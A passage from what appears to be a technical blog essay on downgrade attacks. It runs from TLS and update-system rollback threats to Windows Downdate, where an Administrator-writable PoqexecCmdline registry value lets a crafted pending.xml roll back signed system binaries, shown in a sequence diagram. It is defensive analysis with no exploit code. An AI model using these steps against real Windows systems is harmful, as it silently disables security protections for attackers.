&lt;p&gt;Five months later, in March 2015, Karthikeyan Bhargavan and the miTLS team at INRIA found a near-identical pattern with FREAK: a stripped-down &quot;export-grade&quot; RSA cipher suite from the 1990s was still negotiable, and a fast attacker could factor the 512-bit key during the handshake [@freak-attack-site]. That same April, Möller and Adam Langley shipped RFC 7507 to standardise the first explicit in-band signal that a TLS client was deliberately falling back, so that the server could refuse [@rfc7507]. Three years after that, Eric Rescorla&apos;s TLS 1.3 (RFC 8446) baked downgrade resistance directly into the &lt;code&gt;ServerHello.random&lt;/code&gt; nonce -- a structural fix, not a hint [@rfc8446]. The same period gave us SLOTH from Bhargavan and Gaétan Leurent: a transcript-collision attack on TLS, IKE, and SSH whose mitigation pushed TLS 1.3 to &lt;em&gt;bind&lt;/em&gt; downgrade resistance into the transcript hash, making it impossible to rewrite the negotiation without breaking the integrity check [@sloth-ndss].&lt;/p&gt;
&lt;p&gt;The Microsoft UEFI CA 2023 rollout began in February 2024 with a phased deployment that runs through 2026, replacing the Windows Production 2011 CA in firmware databases worldwide [@msft-uefi-ca-2023]. This rollout is the firmware-layer analogue of TLS 1.3&apos;s binding: each rotation is intended to retire trust in the older signer, but the rotation only matters if the &lt;em&gt;consumer&lt;/em&gt; enforces it.&lt;/p&gt;
&lt;p&gt;Meanwhile, four years before POODLE, a small group of NYU and Tor researchers wrote the academic-canonical paper on what happens when an attacker controls a software update repository instead of a network. Justin Samuel, Nick Mathewson, Justin Cappos, and Roger Dingledine published &lt;em&gt;Survivable Key Compromise in Software Update Systems&lt;/em&gt; at ACM CCS 2010. They formalised three update-specific threats nobody had named before: &lt;strong&gt;rollback attacks&lt;/strong&gt; (the repository serves an older, vulnerable copy of metadata), &lt;strong&gt;freeze attacks&lt;/strong&gt; (the repository serves the same copy forever, preventing a client from ever learning about patches), and &lt;strong&gt;replay attacks&lt;/strong&gt; (the repository serves a stale snapshot to a victim selected by network position) [@tuf-spec; @tuf-security].&lt;/p&gt;
&lt;p&gt;The companion specification, now stewarded by the CNCF, says it plainly: &lt;em&gt;&quot;An attacker presents files to a software update system that are older than those the client has already seen. With no way to tell it is an obsolete version that may contain vulnerabilities, the user installs the software&quot;&lt;/em&gt; [@tuf-security]. That is The Update Framework. Sigstore, Docker Notary, PyPI&apos;s PEP 458, and in-toto all inherit its threat model.&lt;/p&gt;
&lt;p&gt;So by 2015 the academic and protocol communities had named the problem, given it a vocabulary, written a specification, and started shipping standards. Three years later the mobile world followed.&lt;/p&gt;
&lt;h3&gt;From protocols to operating systems&lt;/h3&gt;
&lt;p&gt;In August 2017, Android 8.0 shipped Verified Boot 2.0 (AVB), the first widely-deployed &lt;em&gt;operating-system&lt;/em&gt; rollback defence. AVB stamps a &lt;code&gt;rollback_index&lt;/code&gt; into each signed partition and stores per-slot maxima in TrustZone or in RPMB-backed storage; the bootloader refuses any image whose index is below the stored maximum [@aosp-avb]. The Android source page summarises the design goal: &lt;em&gt;&quot;AVB&apos;s key features include delegating updates for different partitions, a common footer format for signing partitions, and protection from attackers rolling back to a vulnerable version of Android&quot;&lt;/em&gt; [@aosp-avb].&lt;/p&gt;
&lt;p&gt;Three years after Android, Apple shipped the Signed System Volume on macOS Big Sur (November 2020). SSV seals the entire system volume into a single Merkle tree whose root is signed by Apple; on iOS and iPadOS the user cannot disable it [@apple-ssv]. The IETF Software Updates for Internet of Things working group standardised the same threat model in RFC 9019 (April 2021) for embedded firmware: &lt;em&gt;&quot;The firmware image is authenticated and integrity protected. Attempts to flash a maliciously modified firmware image or an image from an unknown, untrusted source must be prevented&quot;&lt;/em&gt; [@rfc9019].&lt;/p&gt;
&lt;p&gt;By 2022, every major mobile platform, every IoT firmware standard, and every modern image-based update system had named rollback as a primary threat and shipped a structural fix. Then came BlackLotus.&lt;/p&gt;

gantt
    title Downgrade attacks and defences, 2010-2024
    dateFormat YYYY-MM
    axisFormat %Y
    section Protocol downgrade
    POODLE (SSL 3.0)            :done, 2014-10, 60d
    FREAK (RSA_EXPORT)          :done, 2015-03, 30d
    RFC 7507 (TLS Fallback SCSV):done, 2015-04, 30d
    SLOTH (transcript collision):done, 2016-01, 30d
    TLS 1.3 (RFC 8446)          :done, 2018-08, 30d
    section Update systems
    TUF / CCS 2010              :done, 2010-10, 30d
    RFC 9019 (IETF SUIT)        :done, 2021-04, 30d
    section OS rollback defence
    Android AVB 2.0             :done, 2017-08, 30d
    Apple Sealed System Volume  :done, 2020-11, 30d
    section Windows precedent
    BlackLotus in the wild      :crit, 2022-10, 150d
    BlackLotus public           :crit, 2023-03, 30d
    Windows Downdate disclosure :crit, 2024-08, 30d
&lt;h3&gt;The Windows precedent&lt;/h3&gt;
&lt;p&gt;Martin Smolar&apos;s &lt;em&gt;BlackLotus UEFI Bootkit: Myth Confirmed&lt;/em&gt; arrived in March 2023, and it was the direct precedent Leviev would cite. BlackLotus was a UEFI bootkit that had been on sale on hacking forums since October 2022 [@welivesecurity-blacklotus]. Its key trick was to ship its own copy of a legitimately Microsoft-signed but vulnerable &lt;code&gt;bootmgfw.efi&lt;/code&gt; -- specifically, a build still affected by CVE-2022-21894, the &quot;Baton Drop&quot; &lt;a href=&quot;https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/&quot; rel=&quot;noopener&quot;&gt;Secure Boot&lt;/a&gt; bypass that Microsoft had patched in January 2022.&lt;/p&gt;
&lt;p&gt;Smolar wrote: &lt;em&gt;&quot;Although the vulnerability was fixed in Microsoft&apos;s January 2022 update, its exploitation is still possible as the affected, validly signed binaries have still not been added to the UEFI revocation list. BlackLotus takes advantage of this, bringing its own copies of legitimate -- but vulnerable -- binaries to the system in order to exploit the vulnerability&quot;&lt;/em&gt; [@welivesecurity-blacklotus]. The NSA shipped a &lt;em&gt;BlackLotus Mitigation Guide&lt;/em&gt; in June 2023 [@nsa-blacklotus-guide]; Microsoft began the laborious process of populating &lt;code&gt;dbx&lt;/code&gt;, the UEFI Secure Boot revocation list, with the offending hashes [@uefi-revocation-list].&lt;/p&gt;
&lt;p&gt;The point that anchors this section: Microsoft &lt;em&gt;did&lt;/em&gt; patch downgrade extensively at the firmware and boot-loader layer in response to BlackLotus. They updated &lt;code&gt;dbx&lt;/code&gt;. They rolled the UEFI Production CA in February 2024 [@msft-uefi-ca-2023]. The architectural lesson -- &lt;em&gt;if you have not declared which version of a signed binary is current, your signature is not enough&lt;/em&gt; -- had been internalised at the bottom of the stack. Whether anybody closed the same gap at the OS-component layer was a question only Leviev seems to have asked.&lt;/p&gt;
&lt;h2&gt;3. The Vista Bargain -- Component-Based Servicing and the Fourth Principal&lt;/h2&gt;
&lt;p&gt;If you sit down at a Windows 11 machine right now, open an elevated PowerShell as a local Administrator, and try to overwrite &lt;code&gt;C:\Windows\System32\ntoskrnl.exe&lt;/code&gt;, Windows will refuse. The error is &lt;em&gt;Access is denied&lt;/em&gt;. That is unexpected, because you are an Administrator, and on every Windows since NT 3.1 Administrators have been the highest principal on the box. The reason has a date.&lt;/p&gt;
&lt;p&gt;In November 2006, Windows Vista shipped a fourth Windows security principal: &lt;code&gt;NT SERVICE\TrustedInstaller&lt;/code&gt;. Its well-known SID is the long numeric string &lt;code&gt;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464&lt;/code&gt;, and its job is to be the only identity permitted to write into most of &lt;code&gt;System32&lt;/code&gt; [@safebreach-2024-aug; @ms-learn-servicing-stack-updates]. Administrators can take ownership of files there and grant themselves write access, but the default ACL excludes them. The change accompanied two other Vista deliverables that, taken together, became the contract that Windows servicing has obeyed for two decades.&lt;/p&gt;

A Windows security principal introduced in Vista that owns most of the system files under `C:\Windows\System32`. Its job is to mediate component-based servicing operations: when you install a Windows Update, the work runs in TrustedInstaller&apos;s context, not the Administrator&apos;s. Direct writes to TrustedInstaller-owned files by other principals (including Administrators) are denied at the ACL.
&lt;p&gt;The first deliverable was &lt;strong&gt;Component-Based Servicing (CBS)&lt;/strong&gt;, the replacement for the self-extracting &lt;code&gt;Update.exe&lt;/code&gt; installers that had defined patch delivery from Windows NT 4.0 through Windows XP. CBS reshaped a Windows update from &quot;a small executable that scribbles into your system directory&quot; into &quot;a manifest-driven transaction over a versioned component store.&quot; The second deliverable was &lt;strong&gt;WinSxS&lt;/strong&gt; -- the side-by-side store under &lt;code&gt;C:\Windows\WinSxS\&lt;/code&gt; that holds every version of every CBS-managed component the system has ever installed [@safebreach-2024-aug; @ms-learn-servicing-stack-updates].&lt;/p&gt;

The Windows servicing architecture introduced in Vista that replaced self-extracting update installers. A CBS package contains a Microsoft-signed security catalog (`.cat`) whose hashes cover the package&apos;s manifest files (`.mum`, `.manifest`). The manifests, transitively trusted via the signed catalog, describe which files belong to which component and how those files should be installed. CBS operations are mediated by the TrustedInstaller service.
&lt;p&gt;The third deliverable was the &lt;strong&gt;manifest-and-catalog signing model&lt;/strong&gt; that knit the first two together. A CBS package contains a security catalog (&lt;code&gt;.cat&lt;/code&gt;) signed directly by Microsoft. The catalog&apos;s hashes cover the package&apos;s manifest files (&lt;code&gt;.mum&lt;/code&gt; and &lt;code&gt;.manifest&lt;/code&gt;); the manifests, in turn, name the package&apos;s payload files and describe their installation. The manifest files are &lt;em&gt;not&lt;/em&gt; signed individually, but their hashes appear in the signed catalog, so they are &lt;em&gt;transitively trusted&lt;/em&gt; [@safebreach-2024-aug]. The payload files are also not individually signed; their hashes appear in the manifests, which are themselves catalog-covered. The chain of custody runs catalog -&amp;gt; manifest -&amp;gt; payload, and at the root is Microsoft&apos;s signing key.&lt;/p&gt;
&lt;p&gt;What this gives you is an elegant, declarative contract for system integrity. Microsoft signs a catalog. The catalog vouches for a manifest. The manifest vouches for a file. The file lands on disk. TrustedInstaller is the only principal allowed to write it, and TrustedInstaller has its own protected service that runs the install transactionally.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;strong&gt;Signed file + TrustedInstaller-only write = system integrity.&lt;/strong&gt; Microsoft built the Vista servicing stack around this contract in 2006-2007. The contract is true on its face. It is also silent about one thing: &lt;em&gt;which version&lt;/em&gt; of a signed file is allowed to land on disk.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That silence is older than CBS. It traces back through the related 2005-2007 file-integrity work. Kernel Patch Protection, marketed as PatchGuard, shipped in x64 Windows Server 2003 SP1 in March 2005 and watches for tampering with running kernel structures [@msft-patchguard-advisory]. KMCS, the Kernel-Mode Code Signing Walkthrough Microsoft published in July 2007, defined the &lt;a href=&quot;https://paragmali.com/blog/windows-kernel-code-integrity-2006-2026/&quot; rel=&quot;noopener&quot;&gt;&lt;em&gt;Driver Signature Enforcement&lt;/em&gt;&lt;/a&gt; policy that kernel-mode code on x64 Vista and later had to satisfy [@kmcs-walkthrough; @msdocs-kmcs-policy].&lt;/p&gt;
&lt;p&gt;The Microsoft Learn descendant page is more direct: &lt;em&gt;&quot;The kernel-mode driver signing policy for 64-bit versions of Windows Vista and later versions of Windows specifies that a kernel-mode driver must be signed for the driver to load&quot;&lt;/em&gt; [@msdocs-driver-signing]. Each of these primitives bound trust to &lt;em&gt;a Microsoft signature&lt;/em&gt;. None of them bound trust to &lt;em&gt;a Microsoft-asserted version&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;This was reasonable in 2007. Update.exe had been the threat: tampering with system files mid-flight, racing the installer, replacing a DLL while the system was rebooting. Vista&apos;s reply was to put the entire operation behind a principal that admins could not impersonate. The threat model said &lt;em&gt;&quot;the attacker is some Administrator-context tool that will try to overwrite system files.&quot;&lt;/em&gt; The reply said &lt;em&gt;&quot;only TrustedInstaller writes system files, and TrustedInstaller will only write files the catalog says are theirs.&quot;&lt;/em&gt; It was a complete answer to the question that had been asked.&lt;/p&gt;
&lt;p&gt;It was an incomplete answer to a question nobody asked: &lt;em&gt;which version of which file goes through that door, and is &quot;which version&quot; a property anyone actually checks?&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Eighteen years later, the answer was: no, &quot;which version&quot; is not a property anyone checks at the file layer. The catalog says &quot;this file belongs to this package.&quot; It does not say &quot;this file is the current member of this component family.&quot;&lt;/p&gt;
&lt;p&gt;The Vista bargain locked the door. It signed the keys. It named a single person who could turn the lock. What it did not do -- and was not designed to do -- was care whether the box behind the door was on the latest update or on the build from two years ago. That decision would land on three later generations of Windows integrity walls, and none of them caught it.&lt;/p&gt;
&lt;h2&gt;4. Generation by Generation -- The Walls That Weren&apos;t Walls of Time&lt;/h2&gt;
&lt;p&gt;Between 2007 and 2022, Microsoft built four more integrity walls on top of the Vista bargain. Each one was a generation forward. None of them added the dimension Windows Downdate needed them to add.&lt;/p&gt;
&lt;h3&gt;Generation 1: Kernel-Mode Code Signing / DSE (Vista x64, 2007)&lt;/h3&gt;
&lt;p&gt;The first wall. The kernel refused to load any driver that was not Authenticode-signed by a Microsoft-cross-signed CA [@kmcs-walkthrough; @msdocs-kmcs-policy; @msdocs-driver-signing]. DSE was enforced at driver load time by the kernel loader; non-signed drivers failed to load with an unmissable error. This was the first architectural assertion that &quot;a Microsoft-signed binary is the unit of trust at the kernel boundary.&quot;&lt;/p&gt;
&lt;p&gt;What it said: a kernel driver must be signed by Microsoft.&lt;/p&gt;
&lt;p&gt;What it did not say: &lt;em&gt;which&lt;/em&gt; Microsoft-signed driver. The catalog-trust model treats any Microsoft-signed version of a file as equally legitimate. That assumption is the one Windows Downdate exploits seventeen years later: signature validity is preserved across version rollback, because the catalog of the older version is still a Microsoft-signed catalog and the hash chain still resolves.&lt;/p&gt;
&lt;h3&gt;Generation 2: UEFI Secure Boot (Windows 8, 2012)&lt;/h3&gt;
&lt;p&gt;The second wall pushed the same idea down into firmware. The platform firmware refused to load a boot manager that was not signed by a key in the UEFI signature database (&lt;code&gt;db&lt;/code&gt;), and refused to load any binary whose hash was in the forbidden-signature database (&lt;code&gt;dbx&lt;/code&gt;) [@welivesecurity-blacklotus; @msft-uefi-ca-2023]. For the first time, Windows had a &lt;em&gt;version-specific revocation primitive at the platform layer&lt;/em&gt;: &lt;code&gt;dbx&lt;/code&gt; could enumerate specific binaries known to be unsafe.&lt;/p&gt;
&lt;p&gt;But &lt;code&gt;dbx&lt;/code&gt; had two problems. The first was rollout latency: BlackLotus demonstrated in 2023 that vulnerable, validly-signed &lt;code&gt;bootmgfw.efi&lt;/code&gt; binaries were still trusted by firmware a full year after Microsoft patched them in source [@welivesecurity-blacklotus]. The second was scope: &lt;code&gt;dbx&lt;/code&gt; covered boot-time binaries, not run-time OS components. A revocation primitive that only fires before &lt;code&gt;ntoskrnl.exe&lt;/code&gt; loads is not a defence against rolling back &lt;code&gt;ntoskrnl.exe&lt;/code&gt; itself.&lt;/p&gt;
&lt;p&gt;The Microsoft UEFI CA 2023 rollout is on a multi-year phased schedule starting February 13, 2024 and running into 2026 [@msft-uefi-ca-2023]. The phased rollout exists precisely because retiring trust in older signers is slow and operationally risky -- the same shape of problem that &lt;code&gt;SkuSiPolicy.p7b&lt;/code&gt; now faces at the OS layer.&lt;/p&gt;
&lt;h3&gt;Generation 3: VBS + HVCI + Credential Guard (Windows 10, 2015)&lt;/h3&gt;
&lt;p&gt;The third wall changed the &lt;em&gt;threat model itself&lt;/em&gt;. Virtualization-Based Security used the Hyper-V hypervisor to create a higher-privilege isolation domain, called &lt;em&gt;Virtual Trust Level 1&lt;/em&gt; (VTL1), beneath the NT kernel&apos;s normal VTL0. Microsoft&apos;s own documentation states the new assumption directly: &lt;em&gt;&quot;VBS uses hardware virtualization and the Windows hypervisor to create an isolated virtual environment that becomes the root of trust of the OS that assumes the kernel can be compromised&quot;&lt;/em&gt; [@msdocs-vbs].&lt;/p&gt;

Virtual Trust Level 1 is the higher-privilege half of the Hyper-V-managed split that VBS introduces. VTL0 holds the normal NT kernel and user-mode processes. VTL1 holds the Secure Kernel (`securekernel.exe`), the kernel-mode Code Integrity policy enforcement (`skci.dll`), and Isolated User Mode trustlets such as the LSA isolation process (`LsaIso.exe`). VTL0 cannot read VTL1 memory; transitions between the two go through a narrow set of hypercalls.
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;HVCI&lt;/a&gt; moved the kernel-mode code integrity check inside VTL1: a malicious kernel could no longer disable the check, because the check ran in a memory space the kernel could not write [@msdocs-vbs-hvci]. &lt;a href=&quot;https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&lt;/a&gt; moved LSA secrets into an Isolated User Mode trustlet, &lt;code&gt;LsaIso.exe&lt;/code&gt;, so a kernel-level attacker could not directly read NTLM hashes or Kerberos TGTs from LSASS memory [@msdocs-credguard]. The explicit, written threat model said: &lt;em&gt;assume the NT kernel can be compromised, and provide a higher-privilege isolation domain for security-critical state.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;That sentence is doing all the work. It says VBS is a defence &lt;em&gt;against&lt;/em&gt; a compromised kernel, which means VBS is a defence against an attacker who has reached kernel code execution by any means. And one of the ways an attacker reaches kernel code execution -- one of the obvious ones, on a single-user Windows machine -- is to be an Administrator. The whole point of VBS was that Administrator code execution is the threat. That fact will matter again in section eight.&lt;/p&gt;
&lt;p&gt;The unsaid assumption in 2015 was that VTL1 components -- &lt;code&gt;securekernel.exe&lt;/code&gt;, &lt;code&gt;skci.dll&lt;/code&gt;, &lt;code&gt;LsaIso.exe&lt;/code&gt;, and the hypervisor binaries &lt;code&gt;hvix64.exe&lt;/code&gt; and &lt;code&gt;hvax64.exe&lt;/code&gt; -- were loaded from on-disk files using CBS+catalog trust, and that CBS+catalog trust was version-agnostic. Microsoft was building a higher trust boundary, but the integrity check for the binaries that lived on the other side of that boundary still ran through the Vista contract.&lt;/p&gt;
&lt;h3&gt;Generation 4: The Microsoft Vulnerable Driver Blocklist (2020 opt-in, default-on November 2022)&lt;/h3&gt;
&lt;p&gt;The fourth wall finally introduced a &lt;em&gt;generic version-revocation primitive&lt;/em&gt; for kernel-loaded code. The Microsoft Vulnerable Driver Blocklist was the answer to a class of attacks that had emerged in the 2010s: &lt;em&gt;bring-your-own-vulnerable-driver&lt;/em&gt;, where a malware loader installed a legitimately-signed, third-party driver with a known kernel exploit and used it as a bridge to kernel execution [@msft-driver-blocklist-blog]. The blocklist&apos;s Microsoft Learn page is direct about scope: the policy targets &lt;em&gt;non-Microsoft-developed drivers across the Windows software environment&lt;/em&gt;, and since the Windows 11 2022 update the blocklist is enabled by default for all devices [@msdocs-driver-blocklist].&lt;/p&gt;
&lt;p&gt;Read that sentence again, slowly. &lt;em&gt;Non-Microsoft-developed drivers.&lt;/em&gt; The blocklist is the right &lt;em&gt;mechanism&lt;/em&gt; -- a Microsoft-signed list of hashes of known-vulnerable signed binaries that the kernel refuses to load -- but it is pointed at the wrong &lt;em&gt;inventory&lt;/em&gt;. First-party Microsoft binaries, including the very VBS components VBS depends on, are out of scope. The same Microsoft team that built the only generic version-revocation primitive Windows ships chose, by policy, not to apply it to themselves.&lt;/p&gt;

flowchart TD
    A[&quot;Vista CBS + TrustedInstaller (2007)&lt;br /&gt;Signed file + restricted writer&quot;] --&amp;gt; B[&quot;KMCS / DSE (2007)&lt;br /&gt;Kernel rejects unsigned drivers&quot;]
    B --&amp;gt; C[&quot;UEFI Secure Boot (2012)&lt;br /&gt;Firmware rejects unsigned boot binaries&lt;br /&gt;dbx revokes specific hashes&quot;]
    C --&amp;gt; D[&quot;VBS + HVCI + Credential Guard (2015)&lt;br /&gt;VTL1 isolation, assume-kernel-compromised&lt;br /&gt;CI policy enforced inside Secure Kernel&quot;]
    D --&amp;gt; E[&quot;Vulnerable Driver Blocklist (2020-2022)&lt;br /&gt;Microsoft-signed hash revocation&lt;br /&gt;Third-party drivers only&quot;]
    E --&amp;gt; F[&quot;Gap: First-party VBS components&lt;br /&gt;still load by catalog signature alone&quot;]

The shape of `dbx` and the shape of `SkuSiPolicy.p7b` are the same: a Microsoft-signed list of hashes a loader refuses. `dbx` lives in UEFI firmware variables and is consulted by the platform boot manager. `SkuSiPolicy.p7b` is a Microsoft-signed Code Integrity policy that lives in the EFI System Partition (when the opt-in UEFI lock is applied) or in the boot session (the default-enabled variant), and is consulted by the Windows kernel loader. The conceptual lineage runs *firmware-layer hash revocation in 2012 -&amp;gt; OS-layer hash revocation in 2024*. The intervening twelve years were spent assuming the OS layer did not need it.
&lt;p&gt;By 2022, Microsoft had built every primitive a Downdate defence would have used. A Microsoft-signed hash-revocation list (the Driver Blocklist). A firmware-rooted enforcement chain (Secure Boot + &lt;code&gt;dbx&lt;/code&gt;). A hypervisor-isolated integrity check (HVCI inside VTL1). What had not been built was a &lt;em&gt;first-party&lt;/em&gt; hash-revocation list -- one that named the historical versions of &lt;code&gt;ci.dll&lt;/code&gt;, &lt;code&gt;ntoskrnl.exe&lt;/code&gt;, &lt;code&gt;securekernel.exe&lt;/code&gt;, &lt;code&gt;hvix64.exe&lt;/code&gt;, and &lt;code&gt;LsaIso.exe&lt;/code&gt; and refused to load them.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Recall the thesis from §1: every Microsoft mitigation since 2015 implicitly assumes the OS being protected is the current one. The mechanism for declaring it -- hash revocation -- had existed since 2012, but it was always pointed at &lt;em&gt;somebody else&apos;s code&lt;/em&gt;. The Driver Blocklist proves Microsoft can ship a first-party hash-revocation list. It just had not been pointed inward.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So Microsoft had built every primitive it needed by 2022: a hash-revocation list, a firmware-rooted enforcement chain, a hypervisor-isolated integrity check. Why, in 2024, is a fully-patched Windows 11 machine still capable of loading a 2022 &lt;code&gt;ci.dll&lt;/code&gt;?&lt;/p&gt;
&lt;h2&gt;5. The Breakthrough -- Where the Integrity Boundary Moves&lt;/h2&gt;
&lt;p&gt;Leviev started with a simple specification. He wanted a downgrade that satisfied four properties [@safebreach-2024-aug]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Undetectable&lt;/strong&gt; by endpoint security tooling.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Invisible&lt;/strong&gt; in &lt;code&gt;winver&lt;/code&gt;, Settings, and the system&apos;s own self-reported state.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Persistent&lt;/strong&gt; across future Windows Update installations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Irreversible&lt;/strong&gt; by &lt;code&gt;sfc /scannow&lt;/code&gt;, &lt;code&gt;DISM /Online /Cleanup-Image /RestoreHealth&lt;/code&gt;, and other repair tooling.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The &quot;undetectable&quot; requirement disqualified almost every obvious approach. Disabling Authenticode checking is detectable. Replacing the catalog signing root is detectable. Booting into Safe Mode and overwriting files is detectable. Loading a vulnerable driver is detectable. Whatever the attack ended up looking like, it had to run through &lt;em&gt;the legitimate Windows Update path&lt;/em&gt;, because that path is the one EDR is least suspicious of.&lt;/p&gt;
&lt;p&gt;Reading Leviev&apos;s August 2024 SafeBreach write-up is a study in patient state-machine reverse engineering. He had to discover the architecture of CBS, where TrustedInstaller fits into it, how &lt;code&gt;pending.xml&lt;/code&gt; action lists are written, where the integrity boundary of each phase lies, and which registry values are TrustedInstaller-protected versus which are merely Administrator-protected. Most of the answer turned out to be hidden in plain sight.&lt;/p&gt;
&lt;h3&gt;The Windows Update state machine&lt;/h3&gt;
&lt;p&gt;A Windows Update flows through a small state machine, and Leviev&apos;s contribution is to draw it precisely.&lt;/p&gt;
&lt;p&gt;A client process in Administrator context calls into the Windows Update Agent COM interfaces. Those interfaces transfer the update folder -- a Microsoft-signed package containing a &lt;code&gt;.cat&lt;/code&gt;, several &lt;code&gt;.mum&lt;/code&gt; and &lt;code&gt;.manifest&lt;/code&gt; files, and the new payload binaries -- to a TrustedInstaller-context server (&lt;code&gt;TrustedInstaller.exe&lt;/code&gt;). The server verifies the catalog signature, walks the manifests, and constructs an &lt;em&gt;action list&lt;/em&gt;. The action list is the work order that explains exactly which files will be renamed, hardlinked, deleted, or written, and which registry values will be set, when the system reboots. Microsoft stores it in a file called &lt;code&gt;pending.xml&lt;/code&gt; under a TrustedInstaller-only directory (&lt;code&gt;C:\Windows\WinSxS\pending.xml&lt;/code&gt;) [@safebreach-2024-aug; @ms-learn-servicing-stack-updates].&lt;/p&gt;
&lt;p&gt;On reboot, before the user logs in, a small program named &lt;code&gt;poqexec.exe&lt;/code&gt; reads &lt;code&gt;pending.xml&lt;/code&gt; and applies it. POQ stands for &quot;Primitive Operations Queue.&quot; The program is the post-reboot transactional engine that performs work the running OS could not safely do while it was running (such as overwriting &lt;code&gt;ntoskrnl.exe&lt;/code&gt;).&lt;/p&gt;

The post-reboot primitive-operations-queue executor. Reads the action list (`pending.xml`) at next boot, before normal services start, and applies its verbs -- hardlinks, file moves, registry writes -- to complete the previous boot&apos;s pending update operations. `poqexec.exe` has no notion of &quot;current version&quot; versus &quot;older version&quot;; it executes whatever action list its configuration points it at.
&lt;p&gt;So far, nothing is wrong. The catalog is signed. The manifests are catalog-covered. The action list lives in a TrustedInstaller-only directory. The executor that consumes it is part of the Windows servicing stack. The chain of custody runs from Microsoft&apos;s signing key through to the on-disk binaries the executor produces.&lt;/p&gt;
&lt;h3&gt;The action list integrity model -- and where it breaks&lt;/h3&gt;
&lt;p&gt;The catch is this. &lt;em&gt;The pointer to &lt;code&gt;pending.xml&lt;/code&gt; is not in a TrustedInstaller-only registry key.&lt;/em&gt; It is in &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Configuration\PoqexecCmdline&lt;/code&gt;. The DACL on that value allows Administrator write. There is a parallel value, &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\PendingXmlIdentifier&lt;/code&gt;, that carries a nonce binding the action list to the boot-session identity; that value is also Administrator-writable [@safebreach-2024-aug; @splunk-downdate-detection].&lt;/p&gt;

The XML work order that describes the file and registry operations a Windows Update will apply at next boot. It uses a small set of POQ verbs (`HardlinkFile`, `MoveFile`, `CreateFile`, `SetFileInformation`, `DeleteFile`, `CreateDirectory`, `CreateKey`, `SetKeyValue`, `SetKeySecurity`, `DeleteKeyValue`, `DeleteKey`). The default copy lives in a TrustedInstaller-only directory. Which copy `poqexec.exe` parses on next boot is determined by an Administrator-writable registry value, `PoqexecCmdline`.
&lt;p&gt;The Administrator who initiates an update can choose &lt;em&gt;which action list &lt;code&gt;poqexec.exe&lt;/code&gt; parses&lt;/em&gt;. The integrity check on the update folder happened at the start of the transaction, in a different phase, with &lt;code&gt;TrustedInstaller&lt;/code&gt; doing the parsing. Once the action list has been produced, the chain of custody depends on Windows believing that &lt;code&gt;pending.xml&lt;/code&gt; came from a Microsoft-signed package. The mechanism by which Windows believes that is a registry value that an Administrator can rewrite.&lt;/p&gt;
&lt;p&gt;Differential update files are not individually signed -- their hashes appear in the catalog-covered manifest, so they inherit catalog trust by reference. This is a perfectly sensible design &lt;em&gt;if you also assert that the manifest you are using is the manifest for the latest update&lt;/em&gt;, which Windows does not.&lt;/p&gt;
&lt;p&gt;That is the architectural error, and it has a name. &lt;strong&gt;The integrity boundary moves between phases of the update.&lt;/strong&gt; The update folder is verified pre-action-list-creation. The action list is verified by being in a TrustedInstaller directory. &lt;em&gt;But the pointer to the action list is in admin-writable territory.&lt;/em&gt; The same identity (Administrator) that can legitimately initiate an update can choose which action list &lt;code&gt;poqexec.exe&lt;/code&gt; parses, and &lt;code&gt;poqexec.exe&lt;/code&gt; was never built to ask &quot;is this list the one I made?&quot;&lt;/p&gt;

sequenceDiagram
    participant Admin as Admin process
    participant TI as TrustedInstaller
    participant Reg as Registry (PoqexecCmdline)
    participant POQ as poqexec.exe (next boot)
    participant FS as System32 files
    Note over Admin,FS: Legitimate Windows Update
    Admin-&amp;gt;&amp;gt;TI: Submit signed update folder over COM
    TI-&amp;gt;&amp;gt;TI: Verify catalog and manifests
    TI-&amp;gt;&amp;gt;FS: Write pending.xml to WinSxS (TI-only)
    TI-&amp;gt;&amp;gt;Reg: Set PoqexecCmdline to default pending.xml
    Admin-&amp;gt;&amp;gt;Admin: Reboot
    POQ-&amp;gt;&amp;gt;Reg: Read PoqexecCmdline
    POQ-&amp;gt;&amp;gt;FS: Read default pending.xml
    POQ-&amp;gt;&amp;gt;FS: Apply verbs, install new files
    Note over Admin,FS: Windows Downdate
    Admin-&amp;gt;&amp;gt;FS: Write crafted pending.xml to attacker dir
    Admin-&amp;gt;&amp;gt;Reg: Overwrite PoqexecCmdline to crafted path
    Admin-&amp;gt;&amp;gt;Reg: Overwrite PendingXmlIdentifier to matching nonce
    Admin-&amp;gt;&amp;gt;Admin: Reboot
    POQ-&amp;gt;&amp;gt;Reg: Read PoqexecCmdline (now attacker path)
    POQ-&amp;gt;&amp;gt;FS: Read crafted pending.xml
    POQ-&amp;gt;&amp;gt;FS: Hardlink older Microsoft-signed binaries over current ones
